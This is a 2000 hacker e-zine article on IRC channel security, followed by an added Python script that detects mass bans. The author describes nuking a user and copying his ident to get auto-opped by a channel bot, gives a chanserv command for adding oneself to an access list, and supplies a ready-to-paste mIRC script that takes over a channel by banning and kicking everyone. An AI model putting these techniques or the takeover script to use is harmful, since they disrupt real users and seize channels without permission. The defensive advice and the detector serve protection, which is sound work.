 _________ SWAT MAGAZINE ISSUE TWENTY EIGHT APRIL 2000 __________
/         \___________________________________________/          \
/                          IRC Security                           \
/                           by _Smurf_                            \
-----------------------------------------------------------------------

Okay, now there are a few things to discuss, and I hope Phreakazoid and
Chicane (owners of #cocytusuk) will take some note of this. I will cover
3 main security threats in this part and maybe more in the future.

Firstly, bots. Bots with AOPs (auto-opped by the server/channel) are a
threat if they also op other people. Take the bots on Undernet in
#as-mag: from the one called X it is easy to gain op status.

Okay, here is how I exploited #as-mag's X bot to give me ops. Firstly I
used the same technique as qwaszx used to cut off his modem coz he wasn't
patched, heh, dumb twat should read SWAT more often, u can still use the
hangup exploit, it's funny.. Anyway, I did it several times b4 I got
bored and decided to test their bot's security...

  »» crashd (~crashd@host5-99-51-172.btinternet.com) has joined #as-mag
  »» X sets mode: +o crashd
  »» Signoff: crashd (~crashd@host5-99-51-172.btinternet.com) (Write error, closing link)
  »» daveywave (~crashd@host5-99-53-235.btinternet.com) has joined #as-mag
  »» X sets mode: +o daveywave
  »» Signoff: daveywave (~crashd@host5-99-53-235.btinternet.com) (Ping timeout for daveywave[host5-99-53-235.btinternet.com])
  »» cd (~crashd@host5-99-51-49.btinternet.com) has joined #as-mag
  »» X sets mode: +o cd

hahah it opped me...

  »» X sets mode: +o AS-R-SHIT

I noticed that the X bot opped him no matter what nick he used, and so
when I nuked him the last time I copied his ident, and I was on
BTinternet, and the bot opped me. So using CrashD's ident I got opped by
the bot, which could then lead on to a channel takeover or adding myself
to an AOP list.

I am not suggesting that you should try and annoy #as-mag with this, but
just to show that IRC bots are not always secure. If you need to use one,
only allow it to op on a password authentication system, where the person
messages the bot and it will then op them if they have the correct ident
and password.

Also other features like the AUTOP feature in mIRC: some people in
#cocytusuk have an AOP feature, which is nice if a mate enters the
channel but not too good if someone with the same ident enters. For
example, TempesT has got Viper on his AOP list; if someone was to change
their ident they could easily get AOP and do a channel takeover or the
AOP method mentioned below. This is hard to stop because it's an auto
thing which can't have a password unless it was coded, which would make
your mIRC into more of a script and would make you into a sorta bot. :o)
So lose the AOP thing, it's pointless and not good security.

Second method, adding yourself to the AOP list. On the server I hang out
on, irc.progenic.com, they have weak security that allows anyone to make
themselves an AOP. If they managed to get ops, either by social
engineering or by using a spoof technique or the bot exploit, all they
would have to do is type

  /chanserv access #channel add host Your_nick

where #channel is the channel you are in and Your_nick is your nick.
This is easy to stop, and if you do not have a bot or any auto-op script
then controlling ops should be easy. But remember, don't have too many
ops or you will have someone who will give ops to any person who enters
the channel. Believe me, I have seen it done before.

Third method is not really an exploit or anything, just one of the things
to do if you're going to take over a channel. How to take over a channel,
basic principle: only leave you there. Here is a little mIRC script. Add
this to the channel popup list: click on the menus Tools, Popups, select
View, Channel and paste the code below into it. But remove my comments at
the end of it or it won't work...
:o)

  TakeChan {
    /topic # TAKEOVER !!! DoN't MeSs WiTh ThE BeSt... $chan is $me 's | Change topic
    /chanserv access # add deny *!*@* | Use chanserv to ban everyone.
    /mode # +b *!*@* | just to make sure ban everyone again.
    /mode # +k Locked_BY_Moi | Add a key to the channel
    set %i 1
    :next
    set %nick $nick(#,%i)
    /mode # +b %nick!*@* | Ban the nick
    if %nick == $null goto done | anyone left?
    if %nick == $me goto miss | ignore me.
    if %nick isop # /ban # %nick | ban any ops.
    /kick # %nick | Kick him.
    :miss
    inc %i
    goto next
    :done
    echo 4 FiNiShEd TaKeOvEr By _Smurf_
  }

People can use this type of script to take over a channel, and so then
they would have full control. Well, they would have some control over it,
but no one else would be able to get in to control it anyway. This is
what we don't want happening to our channel, so get a decent script that
detects mass bans etc. to protect from it.

Anyway, that's all for now, seya all soon

_Smurf_
ICQ: 19084839
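
The closing advice is to run something that detects mass bans. The following Python detector is an added example, not code from the article or from any real protection script: it reads raw IRC MODE and KICK lines and flags a ban-all mask or a burst of bans, keys and kicks from one nick. The log format ("<epoch seconds> <raw line>"), the nicks and hosts, and the WINDOW and THRESHOLD values are assumptions made for the example.

```python
import re
from collections import defaultdict, deque

# Constructed sample: "<epoch seconds> <raw IRC line>" as a logging bot might store it.
SAMPLE_LOG = """\
954547200 :alice!~al@host1.example.net MODE #chan +o bob
954547260 :mallory!~m@host9.example.net MODE #chan +bk *!*@* Locked
954547261 :mallory!~m@host9.example.net MODE #chan +b alice!*@*
954547261 :mallory!~m@host9.example.net KICK #chan alice :bye
954547900 :alice!~al@host1.example.net MODE #chan +b *!*@spam.example.org
"""

LINE = re.compile(r"^(\d+) :([^!\s]+)!\S+ (MODE|KICK) (#\S+) (\S.*)$")
TAKES_ARG = set("bkovl")          # channel modes that consume a parameter
WINDOW, THRESHOLD = 10, 3         # assumed tuning: 3 actions within 10 seconds

def hostile_actions(command, rest):
    """Yield (kind, target) for each ban, key or kick carried by one line."""
    if command == "KICK":
        yield "kick", rest.split()[0]
        return
    modes, *args = rest.split()
    adding = True
    for ch in modes:
        if ch in "+-":
            adding = ch == "+"
        elif ch in TAKES_ARG and (adding or ch != "l"):   # -l has no parameter
            arg = args.pop(0) if args else ""
            if adding and ch in "bk":
                yield ("ban" if ch == "b" else "key"), arg

def detect(log_text):
    """Return a list of (timestamp, nick, reason) alerts."""
    alerts, recent = [], defaultdict(deque)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, nick, command, chan, rest = int(m[1]), m[2], m[3], m[4], m[5]
        for kind, target in hostile_actions(command, rest):
            if kind == "ban" and target == "*!*@*":
                alerts.append((ts, nick, "ban-all mask"))
            q = recent[(chan, nick)]          # sliding window per channel and nick
            q.append(ts)
            while q and ts - q[0] > WINDOW:
                q.popleft()
            if len(q) == THRESHOLD:           # alert once when the burst crosses it
                alerts.append((ts, nick, "mass ban/kick"))
    return alerts
```

A channel guard would act on the first alert (for example by removing ops from the flagged nick) rather than waiting for the kicks to finish.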